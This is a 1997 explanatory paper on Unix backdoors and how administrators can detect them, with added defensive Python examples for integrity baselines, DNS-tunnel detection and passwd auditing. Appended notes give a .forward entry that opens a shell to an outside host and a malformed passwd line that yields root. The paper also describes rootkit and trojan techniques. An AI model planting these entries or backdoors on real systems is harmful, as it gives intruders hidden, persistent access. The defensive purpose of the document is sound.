Backdoors

By Christopher Klaus 8/4/97

Since the early days of intruders breaking into computers, they have tried
to develop techniques or backdoors that allow them to get back into the
system. This paper focuses on many of the common backdoors and possible
ways to check for them. Most of the focus will be on Unix backdoors, with
some discussion of future Windows NT backdoors. It describes the complexity
of the issues in trying to determine the methods that intruders use, and
gives administrators a basis for understanding how they might stop the
intruders from getting back in. When an administrator understands how
difficult it would be to stop an intruder once they are in, the value of
proactively blocking the intruder from ever getting in becomes much
clearer. This is intended to cover many of the popular backdoors commonly
used by beginner and advanced intruders. It is not intended to cover every
possible way to create a backdoor, as the possibilities are limitless.

Backdoors, for most intruders, provide two or three main functions:

Be able to get back into a machine even if the administrator tries to
secure it, e.g., changing all the passwords.

Be able to get back into the machine with the least amount of visibility.
Most backdoors provide a way to avoid being logged and many times the
machine can appear to have no one online even while an intruder is using
it.

Be able to get back into the machine with the least amount of time. Most
intruders want to easily get back into the machine without having to do all
the work of exploiting a hole to gain access.

In some cases, if the intruder thinks the administrator may detect any
installed backdoor, they will resort to using the vulnerability repeatedly
to get on the machine, as the only backdoor, thus not touching anything
that may tip off the administrator. Therefore, in some cases, the
vulnerabilities on a machine remain the only unnoticed backdoor.

Password Cracking Backdoor

One of the first and oldest methods intruders used to gain not only
access to a Unix machine but also backdoors into it was to run a password
cracker. This uncovers weakly passworded accounts. All these new accounts
are now possible backdoors into the machine even if the system
administrator locks out the intruder's current account. Many times, the
intruder will look for unused accounts with easy passwords and change the
password to something difficult. When the administrator looks for all the
weakly passworded accounts, the accounts with modified passwords will not
appear. Thus the administrator will not be able to easily determine which
accounts to lock out.

Rhosts + + Backdoor

On networked Unix machines, services like rsh and rlogin used a simple
authentication method based on hostnames that appear in .rhosts files. A
user could easily configure which machines are not required to supply a
password to log in. An intruder that gained access to someone's .rhosts
file could put a "+ +" in the file, and that would allow anyone from
anywhere to log into that account without a password. Many intruders use
this method, especially when NFS is exporting home directories to the
world. These accounts become backdoors for intruders to get back into the
system. Many intruders prefer rsh over rlogin because it often lacks any
logging capability. Many administrators check for "+ +", so an intruder
may instead put in a hostname and username from another compromised
account on the network, making it less obvious to spot.

Checksum and Timestamp Backdoors

Early on, many intruders replaced binaries with their own trojan versions.
Many system administrators relied on time-stamping and the system checksum
programs, e.g., Unix's sum program, to try to determine when a binary file
had been modified. Intruders developed techniques that recreate the same
time-stamp for the trojan file as the original file. This is accomplished
by setting the system clock back to the original file's time and then
adjusting the trojan file's time to the system clock. Once the binary
trojan file has the exact same time as the original, the system clock is
reset to the current time. The sum program relies on a CRC checksum and is
easily spoofed. Intruders have developed programs that modify the trojan
binary to have the necessary original checksum, thus fooling the
administrators. MD5 checksums are the choice recommended by most vendors
today. MD5 is based on an algorithm that no one has, to date, proven can
be spoofed.

Login Backdoor

On Unix, the login program is the software that usually does the password
authentication when someone telnets to the machine. Intruders grabbed the
source code to login.c and modified it so that when login compared the
user's password with the stored password, it would first check for a
backdoor password. If the user typed in the backdoor password, it would
allow the login regardless of what the administrator set the passwords to.
Thus this allowed the intruder to log into any account, even root. The
password backdoor would spawn access before the user actually logged in
and appeared in utmp and wtmp. Therefore an intruder could be logged in
and have shell access without it appearing that anyone is on that machine
as that account. Administrators started noticing these backdoors,
especially if they ran the "strings" command to find what text was in the
login program. Many times the backdoor password would show up. The
intruders then encrypted or hid the backdoor password better so it would
not appear by just running strings. Many administrators can detect these
backdoors with MD5 checksums.

Telnetd Backdoor

When a user telnets to the machine, the inetd service listens on the port,
receives the connection and then passes it to in.telnetd, which then runs
login. Some intruders knew the administrator was checking the login
program for tampering, so they modified in.telnetd instead. in.telnetd
performs several checks on the user's connection, such as what kind of
terminal the user is using. Typically, the terminal setting might be Xterm
or VT100. An intruder could backdoor it so that when the terminal was set
to "letmein", it would spawn a shell without requiring any authentication.
Intruders have also backdoored some services so that any connection from a
specific source port spawns a shell.

Services Backdoor

Almost every network service has at one time been backdoored by an
intruder. Backdoored versions of finger, rsh, rexec, rlogin, ftp, even
inetd, etc., have been floating around forever. There are programs that
are nothing more than a shell connected to a TCP port, with maybe a
backdoor password to gain access. These programs sometimes replace a
service like uucp that never gets used, or they get added to the
inetd.conf file as a new service. Administrators should be very wary of
what services are running and verify the original services by MD5
checksums.

Cronjob backdoor

Cron on Unix schedules when certain programs should be run. An intruder
could add a backdoor shell program to run between 1 AM and 2 AM. So for 1
hour every night, the intruder could gain access. Intruders have also
looked at legitimate programs that typically run from cron and built
backdoors into those programs as well.

Library backdoors

Almost every UNIX system uses shared libraries. Shared libraries are
intended to reuse many of the same routines, thus cutting down on the size
of programs. Some intruders have backdoored routines like crypt.c and
_crypt.c. Programs like login.c use the crypt() routine, and if the
backdoor password was used it would spawn a shell. Therefore, even if the
administrator was checking the MD5 of the login program, it was still
spawning a backdoor routine, and many administrators were not checking the
libraries as a possible source of backdoors.

One problem for many intruders was that some administrators started taking
MD5 checksums of almost everything. One method intruders used to get
around that is to backdoor the open() and file access routines. The
backdoored routines were configured to read the original files but execute
the trojan backdoors. Therefore, when the MD5 checksum program was reading
these files, the checksums always looked good, but when the system ran the
program, it executed the trojan version. Even the trojan library itself
could be hidden from the MD5 checksums. One way an administrator could get
around this backdoor was to statically link the MD5 checksum checker and
run it on the system. The statically linked program does not use the
trojan shared libraries.

Kernel backdoors

The kernel on Unix is the core of how Unix works. The same method used in
libraries for bypassing MD5 checksums could be used at the kernel level,
except that even a statically linked program could not tell the
difference. A good backdoored kernel is probably one of the hardest things
for administrators to find; fortunately, kernel backdoor scripts have not
yet been widely made available, and no one knows how widespread they
really are.

File system backdoors

An intruder may want to store their loot or data on a server somewhere
without the administrator finding the files. The intruder's files can
typically contain their toolbox of exploit scripts, backdoors, sniffer
logs, copied data like email messages, source code, etc. To hide these
sometimes large files from an administrator, an intruder may patch the
file system commands like "ls", "du", and "fsck" to hide the existence of
certain directories or files. At a very low level, one intruder's backdoor
created a section of the hard drive in a proprietary format and designated
it as "bad" sectors. Thus the intruder could access those hidden files
only with special tools, but for the regular administrator it is very
difficult to determine that the sectors marked "bad" were indeed the
storage area for a hidden file system.

Bootblock backdoors

In the PC world, many viruses have hidden themselves within the bootblock
section, and most antivirus software will check to see if the bootblock
has been altered. On Unix, most administrators do not have any software
that checks the bootblock; therefore some intruders have hidden backdoors
in the bootblock area.

Process hiding backdoors

An intruder many times wants to hide the programs they are running. The
programs they want to hide are commonly a password cracker or a sniffer.
There are quite a few methods and here are some of the more common:

An intruder may write the program to modify its own argv[] to make it look
like another process name.

An intruder could rename the sniffer program to a legitimate service like
in.syslog and run it. Thus when an administrator does a "ps" or looks at
what is running, the standard service names appear.

An intruder could modify the library routines so that "ps" does not show
all the processes.

An intruder could patch a backdoor or program into an interrupt-driven
routine so it does not appear in the process table. An example backdoor
using this technique is amod.tar.gz, available at
http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html

An intruder could modify the kernel to hide certain processes as well.

Rootkit

One of the most popular packages to install backdoors is rootkit. It can
easily be located using Web search engines. From the Rootkit README, here
are the typical files that get installed:

z2 - removes entries from utmp, wtmp, and lastlog.
es - rokstar's ethernet sniffer for sun4 based kernels.
fix - try to fake checksums, install with same dates/perms/u/g.
sl - become root via a magic password sent to login.
ic - modified ifconfig to remove PROMISC flag from output.
ps - hides the processes.
ns - modified netstat to hide connections to certain machines.
ls - hides certain directories and files from being listed.
du5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.

Network traffic backdoors

Not only do intruders want to hide their tracks on the machine, they also
want to hide their network traffic as much as possible. These network
traffic backdoors sometimes allow an intruder to gain access through a
firewall. There are many network backdoor programs that let an intruder
set up a listener on a certain port number on a machine, allowing access
without ever going through the normal services. Because the traffic is
going to a non-standard network port, the administrator can overlook the
intruder's traffic. These network traffic backdoors typically use TCP,
UDP, and ICMP, but they could use many other kinds of packets.

TCP Shell Backdoors

The intruder can set up these TCP shell backdoors on some high port
number, possibly where the firewall is not blocking that TCP port. Many
times they will be protected with a password, just so that an
administrator who connects to it will not immediately see shell access.
An administrator can look for these connections with netstat to see what
ports are listening and where current connections are going to and from.
Many times, these backdoors allow an intruder to get past TCP Wrapper
technology. These backdoors could be run on the SMTP port, on which many
firewalls allow traffic to pass for e-mail.

UDP Shell Backdoors

Administrators can many times spot a TCP connection and notice the odd
behavior, while UDP shell backdoors lack any connection, so netstat would
not show an intruder accessing the Unix machine. Many firewalls have been
configured to allow UDP packets through for services like DNS. Many times,
intruders will place the UDP shell backdoor on that port and it will be
allowed to bypass the firewall.

ICMP Shell Backdoors

Ping is one of the most common ways to find out if a machine is alive, by
sending and receiving ICMP packets. Many firewalls allow outsiders to ping
internal machines. An intruder can put data in the ping ICMP packets and
tunnel a shell between the pinging machines. An administrator may notice a
flurry of ping packets, but unless the administrator looks at the data in
the packets, an intruder can go unnoticed.

Encrypted Link

An administrator can set up a sniffer to try to see whether the data looks
like someone accessing a shell, but an intruder can add encryption to the
network traffic backdoors, and it becomes almost impossible to determine
what is actually being transmitted between the two machines.

Windows NT

Because Windows NT does not easily allow multiple users on a single
machine and remote access similar to Unix, it is harder for an intruder to
break into Windows NT, install a backdoor, and launch an attack from it.
Thus you will more frequently find network attacks that are springboarded
from a Unix box than from Windows NT. As Windows NT advances in multi-user
technologies, this may lead to a higher frequency of intruders who use
Windows NT to their advantage. If this does happen, many of the concepts
from Unix backdoors can be ported to Windows NT, and administrators can be
ready for the intruder. Today, there are already telnet daemons available
for Windows NT, and network traffic backdoors are very feasible for
intruders to install on Windows NT.

Solutions

As backdoor technology advances, it becomes even harder for administrators
to determine if an intruder has gotten in or if they have been successfully
locked out.

Assessment

One of the first steps in being proactive is to assess how vulnerable your
network is, thus being able to figure out what holes exist that should be
fixed. Many commercial tools exist to help scan and audit the network and
systems for vulnerabilities. Many companies could dramatically improve
their security if they only installed the security patches made freely
available by their vendors.

MD5 Baselines

One necessary component of a system scanner is MD5 checksum baselines.
This MD5 baseline should be built from clean systems, before a hacker
attack. Once a hacker is in and has installed backdoors, trying to create
a baseline after the fact could incorporate the backdoors into the
baseline. Several companies had been hacked and had backdoors installed on
their systems for many months. Over time, all the backups of the systems
contained the backdoors. When some of these companies found out they had
a hacker, they restored a backup in hopes of removing any backdoors. The
effort was futile, since they were restoring all the files, even the
backdoored ones. The binary baseline comparison needs to be done before an
attack happens.
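The baseline the Checksum and Timestamp and MD5 Baselines sections describe, as an added example that is not code from Klaus's paper: it hashes every regular file under a directory tree, stores the result off-host, and later reports added, removed and changed files. The demo works in temporary directories with constructed files; it replaces one "binary" with a same-length file and puts the original mtime back, so only the digest exposes the change. MD5 is kept as the paper's recommendation, but the algorithm is a parameter and hashlib accepts sha256 just as well.

```python
"""File-integrity baseline: build it on a clean system, diff it later.
Added example, not code from the 1997 paper. All paths below are
constructed inside temporary directories."""
import hashlib
import json
import os
import tempfile

def file_digest(path, algo="md5", chunk=65536):
    """Hash a file in chunks. MD5 is the paper's 1997 recommendation;
    pass algo="sha256" for current practice (MD5 collisions are known)."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def build_baseline(root, algo="md5"):
    """Map each regular file (path relative to root, '/'-separated) to
    its digest, size and mtime. Symlinks are skipped, not followed."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            st = os.stat(full)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = {"digest": file_digest(full, algo),
                             "size": st.st_size, "mtime": st.st_mtime_ns}
    return baseline

def save_baseline(baseline, path):
    """Persist the baseline; keep this copy off the audited host."""
    with open(path, "w", encoding="utf-8") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)

def load_baseline(path):
    with open(path, encoding="utf-8") as f:
        return json.load(f)

def compare(old, new):
    """Return (added, removed, changed). A file is 'changed' whenever its
    digest differs, even if size and mtime still match, which is exactly
    what the timestamp trick produces."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = sorted(p for p in set(old) & set(new)
                     if old[p]["digest"] != new[p]["digest"])
    return added, removed, changed

def demo():
    """Baseline two constructed 'binaries', then replace bin/login with a
    same-length file and restore its mtime, as the paper describes."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        bindir = os.path.join(root, "bin")
        os.mkdir(bindir)
        for name, body in (("login", b"original login\n"), ("ps", b"original ps\n")):
            with open(os.path.join(bindir, name), "wb") as f:
                f.write(body)
        saved = os.path.join(store, "baseline.json")
        save_baseline(build_baseline(root), saved)

        target = os.path.join(bindir, "login")
        st = os.stat(target)
        with open(target, "wb") as f:
            f.write(b"trojaned login\n")                       # same 15-byte length
        os.utime(target, ns=(st.st_atime_ns, st.st_mtime_ns))  # clock put back

        before, after = load_baseline(saved), build_baseline(root)
        added, removed, changed = compare(before, after)
        return {"added": added, "removed": removed, "changed": changed,
                "size_unchanged": before["bin/login"]["size"] == after["bin/login"]["size"],
                "mtime_unchanged": before["bin/login"]["mtime"] == after["bin/login"]["mtime"]}

if __name__ == "__main__":
    print(demo())
```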

Intrusion detection

Intrusion detection is becoming more important as organizations are hooking
up and allowing connections to some of their machines. Most of the older
intrusion detection technology was based on log events. The latest
intrusion detection system (IDS) technology is based on real-time sniffing
and network traffic security analysis. Many of the network traffic
backdoors can now easily be detected. The latest IDS technology can take a
look at the UDP packets on the DNS port and determine whether they match
DNS protocol requests. If the data on the DNS port does not match the DNS
protocol, an alert can be signaled and the data captured for further
analysis. The same principle can be applied to the data in an ICMP packet
to see if it is the normal ping data or if it is carrying an encrypted
shell session.
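The protocol check described above, as an added example that is not part of the paper: it treats a UDP payload seen on port 53 in the client-to-server direction as a DNS query and tests it against the RFC 1035 header and question-section format, so a shell tunnel riding that port is reported with the reason it failed. Both sample packets are constructed here, not captured; the same approach applies to ICMP echo payloads.

```python
"""Flag UDP port-53 payloads that do not parse as DNS queries.
Added example, not from the paper. The sample packets are constructed."""
import struct

# id, flags, qdcount, ancount, nscount, arcount (RFC 1035 section 4.1.1)
DNS_HEADER = struct.Struct("!HHHHHH")

def _parse_qname(payload, off):
    """Parse an uncompressed name (RFC 1035 section 3.1); return (labels, offset)."""
    labels, total = [], 0
    while True:
        if off >= len(payload):
            raise ValueError("name runs past end of packet")
        length = payload[off]
        off += 1
        if length == 0:
            return labels, off
        if length & 0xC0 == 0xC0:
            raise ValueError("compression pointer in question name")
        if length > 63:
            raise ValueError("label longer than 63 octets")
        total += length + 1
        if total > 255:
            raise ValueError("name longer than 255 octets")
        label = payload[off:off + length]
        if len(label) != length:
            raise ValueError("truncated label")
        labels.append(label.decode("ascii", "replace"))
        off += length

def check_dns_query(payload):
    """Return (ok, reason) for a client-to-server payload seen on UDP/53."""
    if len(payload) < DNS_HEADER.size:
        return False, "shorter than DNS header"
    _ident, flags, qd, an, ns, ar = DNS_HEADER.unpack_from(payload)
    if flags & 0x8000:
        return False, "QR bit set: a response sent in the query direction"
    if ((flags >> 11) & 0xF) not in (0, 1, 2):      # QUERY, IQUERY, STATUS
        return False, "unknown opcode"
    if flags & 0x0040:
        return False, "reserved Z bit set"
    if qd == 0:
        return False, "query with no question"
    if an or ns:
        return False, "answer/authority records in a query"
    off = DNS_HEADER.size
    try:
        for _ in range(qd):
            _labels, off = _parse_qname(payload, off)
            if off + 4 > len(payload):
                raise ValueError("question truncated before QTYPE/QCLASS")
            _qtype, qclass = struct.unpack_from("!HH", payload, off)
            off += 4
            if qclass not in (1, 3, 4, 255):         # IN, CH, HS, ANY
                raise ValueError("unknown QCLASS %d" % qclass)
    except ValueError as exc:
        return False, str(exc)
    # Bytes after the question are legitimate only as additional records (EDNS OPT).
    if off != len(payload) and ar == 0:
        return False, "%d trailing bytes after question section" % (len(payload) - off)
    return True, "well-formed query"

def build_query(name, qtype=1, ident=0x1234):
    """Build a plain recursive query; used here only to make sample input."""
    qname = b"".join(bytes([len(lbl)]) + lbl.encode("ascii")
                     for lbl in name.split(".")) + b"\x00"
    return DNS_HEADER.pack(ident, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)

# Constructed samples: an ordinary lookup, and a tunnel that fakes a header
# and then carries shell output as text. Neither is a live capture.
SAMPLE_QUERY = build_query("www.example.com")
SAMPLE_TUNNEL = DNS_HEADER.pack(0x1337, 0x0100, 1, 0, 0, 0) + b"drwxr-xr-x 4 root root 4096 .\n"

if __name__ == "__main__":
    for pkt in (SAMPLE_QUERY, SAMPLE_TUNNEL, b"id\n"):
        print(len(pkt), check_dns_query(pkt))
```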

Boot from CD-ROM

Some administrators may want to consider booting from CD-ROM thus
eliminating the possibility of an intruder installing a backdoor on the
CD-ROM. The problem with this method is the cost and time of implementing
this solution enterprise wide.

Vigilance

Because the security field is changing so fast, with new vulnerabilities
being announced daily and intruders constantly designing new attack and
backdoor techniques, no security technology is effective without vigilance.

Be aware that no defense is foolproof, and that there is no substitute for
diligent attention.

-------------------------------------------------------------------------

you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:

\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

Permutations of this method include alteration of the system's mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation; the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).

PS: The above method is also useful for gaining access to a company's
mailhub (assuming there is a shared home directory FS on
the client and server).

> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).

---------------------------------------------------------------------------

you may want to add this "feature" that can act as a backdoor:

when specifying a wrong uid/gid in the /etc/password file,
most login(1) implementations will fail to detect the wrong
uid/gid and atoi(3) will set uid/gid to 0, giving superuser
privileges.

example:
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
on Linux boxes, this will give uid 0 to user rmartin.
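An audit for the condition the note above describes, as an added example that is not part of the note or the paper: it emulates C atoi(3) on the uid and gid fields of passwd lines, so a non-numeric field is reported together with the value an atoi-based login would compute, and it also flags uid or gid 0 on any account other than root. The sample file is constructed; only the rmartin line is taken from the note.

```python
"""Audit passwd entries for non-numeric or zero uid/gid fields.
Added example, not part of the original note. The sample file below is
constructed; only the rmartin line is taken from the note."""
import re

_ATOI = re.compile(r"\s*([+-]?)(\d*)", re.ASCII)
_DIGITS = re.compile(r"\d+", re.ASCII)

def atoi(text):
    """Emulate C atoi(3): optional whitespace and sign, then leading digits;
    anything else stops the parse, and no digits at all yields 0."""
    m = _ATOI.match(text)
    sign, digits = m.group(1), m.group(2)
    if not digits:
        return 0
    return -int(digits) if sign == "-" else int(digits)

def audit_passwd(lines):
    """Return [(username, finding)] for an iterable of passwd lines.
    Flags malformed lines, uid/gid fields that are not plain decimal
    strings (reporting what atoi would turn them into), and uid or gid 0
    on any account other than root."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        line = raw.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "line %d has %d fields, expected 7"
                             % (lineno, len(fields))))
            continue
        user, _pw, uid, gid, _gecos, _home, _shell = fields
        for name, value in (("uid", uid), ("gid", gid)):
            if not _DIGITS.fullmatch(value):
                findings.append((user, "non-numeric %s %r: atoi() would yield %d"
                                 % (name, value, atoi(value))))
            elif int(value) == 0 and user != "root":
                findings.append((user, "%s 0 on non-root account" % name))
    return findings

# Constructed sample passwd content (rmartin line from the note above).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
toor:x:0:0:spare root:/root:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
""".splitlines()

if __name__ == "__main__":
    for user, finding in audit_passwd(SAMPLE_PASSWD):
        print("%-8s %s" % (user, finding))
```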
